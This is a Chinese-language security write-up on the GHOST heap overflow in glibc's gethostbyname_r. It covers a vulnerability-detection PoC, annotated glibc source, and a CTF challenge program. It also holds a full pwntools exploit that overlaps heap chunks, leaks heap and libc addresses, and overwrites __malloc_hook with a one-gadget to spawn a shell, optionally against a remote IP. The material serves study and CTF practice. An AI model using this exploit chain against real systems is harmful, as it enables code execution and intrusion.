GHOST漏洞解析与题解

阅读量    42178 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

漏洞描述

  • glibc的__nss_hostname_digits_dots存在缓冲区溢出漏洞,导致使用gethostbyname系列函数的某些软件存在代码执行或者信息泄露的安全风险
  • 通过gethostbyname()函数或gethostbyname2()函数,将可能产生一个堆上的缓冲区溢出
  • 经由gethostbyname_r()或gethostbyname2_r(),则会触发调用者提供的缓冲区溢出
  • 漏洞产生时至多sizeof(char* )个字节可被覆盖
  • 影响范围:2.2 <= glibc <=2.17
  • gethostbyname*()系列函数
#include <netdb.h>

struct hostent * gethostbyname(const char * hostname);   //根据输入的主机名,查找IP地址

/* Glibc2  also  has  reentrant  versions  gethostent_r(),  gethostbyaddr_r(),  gethostbyname_r()  and gethostbyname2_r().  
   The caller supplies a hostent structure ret which will be filled in on success,  and  a  temporary work  buffer  buf  of size buflen.  
   After the call, result will point to the result on success. */
int gethostbyname_r(                            //和gethostbyname原理一样,只是内存分配交给用户
                        const char *name,         //要解析的名字
                        struct hostent *ret,     //保存返回值的地方
                        char *buf,                 //这个函数运行时的缓冲区
                        size_t buflen,             //缓冲区长度
                        struct hostent **result,//如果失败,则result为null,如果成功则指向ret
                        int *h_errnop            //保存错误代码
                  );
  • 结构体
/* Description of data base entry for a single host.  描述一个地址最基本的条目 */
struct hostent
{
  char *h_name;            /* Official name of host.  正式主机名*/
  char **h_aliases;        /* Alias list.  别名*/
  int h_addrtype;        /* Host address type.  IP地址类型*/
  int h_length;            /* Length of address.  地址长度*/
  char **h_addr_list;        /* List of addresses from name server.  IP地址列表*/
};

  • 用法
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>

int main(int argc, char** argv){
    char* name = argv[1];
    struct hostent* host = gethostbyname(name);
    if(host==NULL)
        printf("error\n");
    else{
        printf("%s\n", host->h_name);
        for(int i=0; host->h_aliases[i]!=NULL; i++)
            printf("\t%s\n", host->h_aliases[i]);

        printf("IP type %d, IP addr len %d\n", host->h_addrtype, host->h_length);
        char buffer[INET_ADDRSTRLEN];
        for(int i=0; host->h_addr_list[i]!=NULL; i++){
            char* ip = inet_ntop(host->h_addrtype, host->h_addr_list[i], buffer, sizeof(buffer));
            printf("\t%s\n", ip);
        }
    }
}

https://blog.csdn.net/daiyudong2020/article/details/51946080

  • 特殊点:如果name输入的是IP地址,则不会去DNS查询,而是直接写入到hostent指向的内存区中,这里因为没有进行合法性判断,所以输入奇怪的IP,比如检测代码中的一串0。它会被直接写入tmp.buffer,一同写入的还包括解析的主机信息。所以就很容易超过tmp.buffer的长度,造成溢出。

POC

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct
{
   char buffer[1024];
   char canary[sizeof(CANARY)];
} temp = {"buffer", CANARY};

int main(void)
{
   struct hostent resbuf;
   struct hostent *result;
   int herrno;
   int retval;
    
   /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
   size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char) - 2 * sizeof(char *) - 1;
   char name[sizeof(temp.buffer)];
   memset(name, '0', len);
   name[len] = '\0';
   
    retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
   if (strcmp(temp.canary, CANARY) != 0)
   {
      puts("vulnerable");
      exit(EXIT_SUCCESS);
   }
   if (retval == ERANGE)
   {
      puts("not vulnerable");
      exit(EXIT_SUCCESS);
   }
   puts("should not happen");
   exit(EXIT_FAILURE);
}

 

源码分析

gethostbyname函数入口点在inet/gethsbynm.c系列文件中

#define LOOKUP_TYPE	struct hostent
#define FUNCTION_NAME	gethostbyname
#define DATABASE_NAME	hosts
#define ADD_PARAMS	const char *name
#define ADD_VARIABLES	name
#define BUFLEN		1024
#define NEED_H_ERRNO	1

#define HANDLE_DIGITS_DOTS	1

#include <nss/getXXbyYY.c> //通过宏达到模版展开的效果
  •  nss/getXXbyYY.c也先通过__nss_hostname_digits_dots()判断是否为IP,
    • 如果要解析IP的话就直接结束
    • 如果是域名那么后面调用__gethostbyname_r()进行解析
//根据宏定义, 会自动被展开为一个函数定义, 这里会展开为gethostbyname()的定义
LOOKUP_TYPE *FUNCTION_NAME(const char *name) //函数定义
{
    static size_t buffer_size; //静态缓冲区的长度
    static LOOKUP_TYPE resbuf;
    LOOKUP_TYPE *result;

#ifdef NEED_H_ERRNO
    int h_errno_tmp = 0;
#endif

    /* Get lock.  */
    __libc_lock_lock(lock);

    if (buffer == NULL) //如果没有缓冲区就自己申请一个
    {
        buffer_size = BUFLEN;
        buffer = (char *)malloc(buffer_size);
    }

#ifdef HANDLE_DIGITS_DOTS
    if (buffer != NULL)
    {
        /*
            - 发生漏洞的函数
            - __nss_hostname_digits_dots()先对name进行预处理
                - 如果要解析的name就是IP, 那就复制到resbuf中, 然后返回1
                - 如果是域名, 那么就复制到resbuf中, 返回0
            - 如果返回1, 说明解析的就是IP, 你那么进入done, 解析结束
        */
        if (__nss_hostname_digits_dots(name,         //传入的参数: 域名
                                       &resbuf,      //解析结果
                                       &buffer,      //缓冲区
                                       &buffer_size, //缓冲区大小指针
                                       0,            //缓冲区大小
                                       &result,      //存放结果的指针
                                       NULL,         //存放状态的指针
                                       AF_VAL,       //地址族
                                       H_ERRNO_VAR_P //错误代码
                                       ))
            goto done;
    }
#endif

    /* DNS域名解析,宏展开
   *    (INTERNAL(REENTRANT_NAME)(ADD_VARIABLES, &resbuf, buffer, buffer_size, &result H_ERRNO_VAR) 
   * => (INTERNAL(gethostbyname_r)(name, &resbuf, buffer, buffer_size, &result, &h_errno_tmp) 
   * => (INTERNAL1(gethostbyname_r)(name, &resbuf, buffer, buffer_size, &result, &h_errno_tmp) 
   * => __gethostbyname_r(name, &resbuf, buffer, buffer_size, &result, &h_errno_tmp)
  */
    while (buffer != NULL && (INTERNAL(REENTRANT_NAME)(ADD_VARIABLES, &resbuf, buffer, buffer_size, &result H_ERRNO_VAR) == ERANGE)
#ifdef NEED_H_ERRNO
           && h_errno_tmp == NETDB_INTERNAL
#endif
    )
    {
        char *new_buf;
        buffer_size *= 2;
        new_buf = (char *)realloc(buffer, buffer_size);
        if (new_buf == NULL)
        {
            /* We are out of memory.  Free the current buffer so that the
         process gets a chance for a normal termination.  */
            free(buffer);
            __set_errno(ENOMEM);
        }
        buffer = new_buf;
    }

    if (buffer == NULL)
        result = NULL;

#ifdef HANDLE_DIGITS_DOTS
done:
#endif
    /* Release lock.  */
    __libc_lock_unlock(lock);

#ifdef NEED_H_ERRNO
    if (h_errno_tmp != 0)
        __set_h_errno(h_errno_tmp);
#endif

    return result;
}
  • 漏洞函数:nss/digits_dots.c :__nss_hostname_digits_dots(name, resbuf, buffer, …)
    • 这个函数负责处理name为IP地址的情况, 当name为域名时只是进行一些复制工作
    • name指向要解析的字符串
    • resbuf指向存放解析结果的hostennt结构体
    • buffer则为解析时所分配的空间, resbuf中的指针指向buffer分配的空间
int __nss_hostname_digits_dots(const char *name,        //要解析的名字
                               struct hostent *resbuf,    //存放结果的缓冲区
                               char **buffer,            //缓冲区
                               size_t *buffer_size,        //缓冲区长度 1K
                               size_t buflen,            //0
                               struct hostent **result, //指向结果指针的指针
                               enum nss_status *status, //状态 NULL
                               int af,                    //地址族
                               int *h_errnop)            //错误代码
{
    int save;

    //...

    /*
   * disallow names consisting only of digits/dots, unless they end in a dot.
   * 不允许name只包含数字和点,除非用点结束
   */
    if (isdigit(name[0]) || isxdigit(name[0]) || name[0] == ':') //name开头是十进制字符/十六进制字符/冒号,就判断为IP地址
    {
        const char *cp;
        char *hostname;

        //host_addr是一个指向16个unsignned char数组的指针
        typedef unsigned char host_addr_t[16];
        host_addr_t *host_addr;

        //h_addr_ptrs就是一个指向两个char*数组的指针
        typedef char *host_addr_list_t[2];
        host_addr_list_t *h_addr_ptrs;

        //别名的指针列表
        char **h_alias_ptr;

        //需要的空间
        size_t size_needed;

        //根据地址族计算IP地址长度
        int addr_size;
        switch (af)
        {
        case AF_INET:              //IPV4
            addr_size = INADDRSZ; //INADDRSZ=4
            break;

        case AF_INET6:               //IPV6
            addr_size = IN6ADDRSZ; //IN6ADDRSZ=16
            break;

        default:
            af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET;
            addr_size = af == AF_INET6 ? IN6ADDRSZ : INADDRSZ;
            break;
        }

        //计算函数运行所需要的缓冲区大小,这里出了问题,没有给h_alias_ptr分配空间,因此产生溢出
        size_needed = (sizeof(*host_addr) + sizeof(*h_addr_ptrs) + strlen(name) + 1); //16 + 16 + strlen(name) + 1

        //如果buffer_size指针为空, 并且buflen还不够, 那么重新申请缓冲区时就没法更新buffer_size, 只能报错
        if (buffer_size == NULL)
        {
            if (buflen < size_needed)
            {
                if (h_errnop != NULL)
                    *h_errnop = TRY_AGAIN;
                __set_errno(ERANGE);
                goto done;
            }
        }
        else if (buffer_size != NULL && *buffer_size < size_needed) //如果给的缓冲区不足,就重新调整buffer空间
        {
            char *new_buf;
            *buffer_size = size_needed;                          //新buffer_size
            new_buf = (char *)realloc(*buffer, *buffer_size); //就把buffer空间调整到所需要的大小
            //分配失败
            if (new_buf == NULL)
            {
                save = errno;
                free(*buffer);
                *buffer = NULL;
                *buffer_size = 0;
                __set_errno(save);
                if (h_errnop != NULL)
                    *h_errnop = TRY_AGAIN;
                *result = NULL;
                goto done;
            }
            *buffer = new_buf; //写入新缓冲区
        }

        //缓冲区初始化
        memset(*buffer, '\0', size_needed);

        //对缓冲区进行分割
        host_addr = (host_addr_t *)*buffer;                                            //占用0x10B        [*buffer, *buffer + 0x10)
        h_addr_ptrs = (host_addr_list_t *)((char *)host_addr + sizeof(*host_addr)); //占用0x10B        [*buffer + 0x10, *buffer + 0x20)

        //这里出了问题,没有给h_alias_ptr分配空间,因此产生溢出
        h_alias_ptr = (char **)((char *)h_addr_ptrs + sizeof(*h_addr_ptrs)); //占用0x8B                [*buffer + 0x20, *buffer + 0x28)
        hostname = (char *)h_alias_ptr + sizeof(*h_alias_ptr);                 //占用strlen(name)+1    [*buffer + 0x28, *buffer + 0x28 + strlen(name) + 1)

        if (isdigit(name[0])) //IPv4: 开头是数字
        {
            for (cp = name;; ++cp) //遍历name
            {
                if (*cp == '\0') //如果name结束了
                {
                    int ok;

                    if (*--cp == '.') //如果是.\0这样的,则非法
                        break;

                    //IP地址是字符串表示,转换成网络序列保存在host_addr中, host_addr用的就是函数内部的缓冲区*buffer
                    if (af == AF_INET)
                        ok = __inet_aton(name, (struct in_addr *)host_addr);
                    else
                    {
                        assert(af == AF_INET6);
                        ok = inet_pton(af, name, host_addr) > 0;
                    }

                    //转换出错
                    if (!ok)
                    {
                        *h_errnop = HOST_NOT_FOUND;
                        if (buffer_size)
                            *result = NULL;
                        goto done;
                    }

                    //直接把name复制到hostname中, 用hostname作为结果中的h_name
                    //strcpy从*buffer+0x28开始写入strlen(name)+1, 产生溢出
                    resbuf->h_name = strcpy(hostname, name);

                    //没有别名
                    h_alias_ptr[0] = NULL;
                    resbuf->h_aliases = h_alias_ptr;

                    //h_addr_list只有一个
                    (*h_addr_ptrs)[0] = (char *)host_addr; //地址也是一样的
                    (*h_addr_ptrs)[1] = NULL;
                    resbuf->h_addr_list = *h_addr_ptrs;

                    //设置长度与IP地址类型
                    if (af == AF_INET && (_res.options & RES_USE_INET6))
                    {
                        //...
                    }
                    else
                    {
                        resbuf->h_addrtype = af;
                        resbuf->h_length = addr_size;
                    }

                    //返回的状态
                    //...

                    //结束
                    goto done;
                }

                if (!isdigit(*cp) && *cp != '.') //既不是字母,又不是. 那么就不是合法的IPv4,退出
                    break;
            }
        }

        if ((isxdigit(name[0]) && strchr(name, ':') != NULL) || name[0] == ':') //IPv6: 开始是hex字符并且包含':'. 或者包含分号
        {
            //...
        }
    }

    return 0;

done:
    return 1;
}
  • 判断IP地址的方法很简陋

  • 在生成hostent结构体时出了问题没有计算h_alias_ptr

图示:

  • 因此把hostname复制过去,在这里产生了溢出8B

  • 函数的数据结构:

 

题目解析

题目源码

//gcc pwn.c -g -o pwn
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <arpa/inet.h>
#define MAX 16

struct hostent* HostArr[MAX];
char* BufferArr[MAX];
char* NameArr[MAX];

int Menu(void)
{
    puts("1.InputName");
    puts("2.ShowHost");
    puts("3.Delete");
    puts("4.Exit");
    printf(">>");
    int cmd;
    scanf("%d", &cmd);
    return cmd;
}

void InputName(void)
{
    //read idx
    int idx;
    printf("idx:");
    scanf("%d", &idx);
    if(idx<0 || idx>=MAX)
        exit(0);

    //alloc name buf
    int len;
    printf("len:");
    scanf("%d", &len);
    NameArr[idx] = malloc(len+1);
    if(NameArr[idx]==NULL)
        exit(0);

    //read name
    int i;
    for(i=0; i<len; i++)
    {
        char C;
        read(0, &C, 1);
        NameArr[idx][i] = C;
        if(NameArr[idx][i]=='\n')
            break;
    }
    NameArr[idx][i]='\0';

    //allloc buffer
    int buffer_size = 0x20+len+1;
    BufferArr[idx] = malloc(buffer_size);

    //get host by name
    HostArr[idx] = malloc(sizeof(struct hostent));
    struct hostent* res;    
    int herrno;
    gethostbyname_r(NameArr[idx], HostArr[idx], BufferArr[idx], buffer_size, &res, &herrno);
}

void ShowHost(void)
{
    //read idx
    int idx;
    printf("idx:");
    scanf("%d", &idx);
    if(idx<0 || idx>=MAX)
        exit(0);

    struct hostent* host = HostArr[idx];

    //host name
    if(host->h_name!=NULL)
        printf("%s\n", host->h_name);

    //IP
    if(host->h_addr_list!=NULL)
           for(int i=0; host->h_addr_list[i]!=NULL; i++){
            char* ip = host->h_addr_list[i];
            printf("%s\n", ip);
        }
}

void Delete(void)
{
    //read idx
    int idx;
    printf("idx:");
    scanf("%d", &idx);
    if(idx<0 || idx>=MAX)
        exit(0);

    free(NameArr[idx]);
    NameArr[idx]=NULL;
    free(BufferArr[idx]);
    BufferArr[idx]=NULL;
    free(HostArr[idx]);
    HostArr[idx]=NULL;
}

int main(int argc, char** argv)
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    int cmd=0;
    while(1)
    {
        cmd = Menu();
        if(cmd==1)
            InputName();
        else if(cmd==2)
            ShowHost();
        else if(cmd==3)
            Delete();
        else
            break;
    }
    return 0;
}
  • 编译时保护全开

  • patchelf让编译出的文件使用2.17的libc
    patchelf --set-interpreter `pwd`/ld.so.2 --set-rpath `pwd` ./pwn
    

 

思路

  • 构造chunk重叠
    • 覆盖size的目的是构造chunk重叠, 这样才能控制堆上的各种指针
    • __nss_hostname_digits_dots向buffer写入时要求只能是.和十进制字符, 实测发现只写入0是最稳定可以溢出的
    • hostent的size本来就是0x30, 只覆盖为一个’0’也还是0x30, 因此覆盖两个0, 让chunksize变成0x3030
  • 自此又产生了三种思路,
    • 如果覆盖为0x3031, 在chunk后面放0x21的在使用chunk, 直接得到一个非常大的UBchunk
    • 使用top chunk作为后一个chunk, 从而与top合并
    • 如果覆盖为0x3030, 那么可以通过P=0向前合并
  • free时的检查

  • check_in_chunk()检查最少的就是后一个chunkP=1, 并且不是top chunk的情况,

  • 因此溢出Bufer的size为0x3031之后, 只需要再Buffer chunk+0x3030处伪造放上一个flat(0, 0x21, 0, 0)的chunk就可得到一个很大的UBchunk
  • __nss_hostname_digits_dots在写入时对于name限制很多, 因此我们只用他去溢出size, 读入name的过程对字符限制很少, 因此总体思路为
    • 利用gethostbyname_r()溢出size
    • 利用read(0, name, ..)进行写入任意数据

泄露地址

  • Show时会通过hostent结构体中得到指针进行输出, 因此我们打出chunk 重叠之后, 有两个思路
    • 利用00写入覆盖hostent.h_name指针的最低字节, 使其指向某个指针, 然后泄露地址
    • 直接Bin机制在hostent中写入指针, 然后写入地址
  • 第二种更具有普适性, 不需要细致的调整, 因此选择第二个思路:
    • 假如有N0 | B0|H0 | N1 | B1 | H1
    • 利用__nss_hostname_digits_dots()在写入B0时溢出0的chunk size为0x3031
    • 然后通过布局在H0+0x3030的位置放上flat(0, 0x21, 0, 0)伪造H0的nextchunk
      f – ree(H0)即可打出chunk 重叠, 此时UB<=>(B0, H0, N1, B1, H1)
    • 然后通过切割UB, 使得UB的fd bk指针写入到H1内部, 如下图
    • 然后show(3)即可泄露地址

getshell

  • 有了地址之后getshell就很容易了
    • 再N1 B1 H1后面通过布局0x70的chunk, 然后free掉, 进入Fastbin[0x70]
    • 然后继续切割chunk, 修改fastbin chunk的fd为__malloc_hook-0x23, 利用0x7F伪造size
    • 然后修改__malloc_hook为OGG

EXP

#! /usr/bin/python
# coding=utf-8
import sys
from pwn import *
from random import randint

context.log_level = 'debug'
context(arch='amd64', os='linux')

elf_path = "./pwn"

elf = ELF(elf_path)
libc = ELF('libc.so.6')

def Log(name):    
    log.success(name+' = '+hex(eval(name)))

if(len(sys.argv)==1):            #local
    cmd = [elf_path]
    sh = process(cmd)
    #proc_base = sh.libs()['/home/parallels/pwn']
else:                            #remtoe
    sh = remote('118.190.62.234', 12435)

def Num(n):
    sh.sendline(str(n))

def Cmd(n):
    sh.recvuntil('>>')
    Num(n)

def Name(idx, name):
    Cmd(1)
    sh.recvuntil('idx:')
    Num(idx)
    sh.recvuntil('len:')
    Num(len(name))
    sh.sendline(name)

def Show(idx):
    Cmd(2)
    sh.recvuntil('idx:')
    Num(idx)

def Delete(idx):
    Cmd(3)
    sh.recvuntil('idx:')
    Num(idx)

#chunk overlap
Name(0, '0'*0x2F)
Name(1, '0'*0x40+'10')
Name(2, '0'*0x5F)

Name(3, '0'*0x1F)
Delete(3)
Name(3, '0'*0x1F)        #switch Name and Host

Name(10, '0'*0x5F)
Name(11, '0'*0x5F)
Name(12, '0'*0x5F)
Name(13, '0'*0x5F)


exp = '0'*0x2950
exp+= flat(0, 0x21, 0, 0)    #B0's next chunk
Name(5, exp)
Delete(1)                #UB<=>(H0, 0x3030)

#leak addr
exp = '0'.ljust(0x7F, '\x00')
Name(6, exp)            #split UB chunk, H3's h_addr_list=UB's bk
Show(3)

sh.recvuntil('0'*0x1F+'\n\n')
heap_addr = u64(sh.recv(6).ljust(8, '\x00'))-0x358
Log('heap_addr')
sh.recv(17)
libc.address = u64(sh.recv(6).ljust(8, '\x00'))-0x3c17a8
Log('libc.address')

#fastbin Attack
Delete(10)
exp = '0'*0x4F
Name(7, exp)

exp = '0'*0x10
exp+= flat(0, 0x71, libc.symbols['__malloc_hook']-0x23)
exp = exp.ljust(0xBF, '0')
Name(7, exp)

Name(8, '0'*0x5F)

exp = '0'*0x13
exp+= p64(libc.address+0x462b8)
Name(8, exp.ljust(0x5F, '0'))


#gdb.attach(sh, '''
#heap bins
#telescope 0x202040+0x0000555555554000 48
#break malloc
#''')



sh.interactive()

'''
NameArr            telescope 0x202040+0x0000555555554000
HostArr            telescope 0x2020C0+0x0000555555554000
BufferArr        telescope 0x2022C0+0x0000555555554000 

0x46262 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rax == NULL

0x462b8 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0xe66b5 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

'''
分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多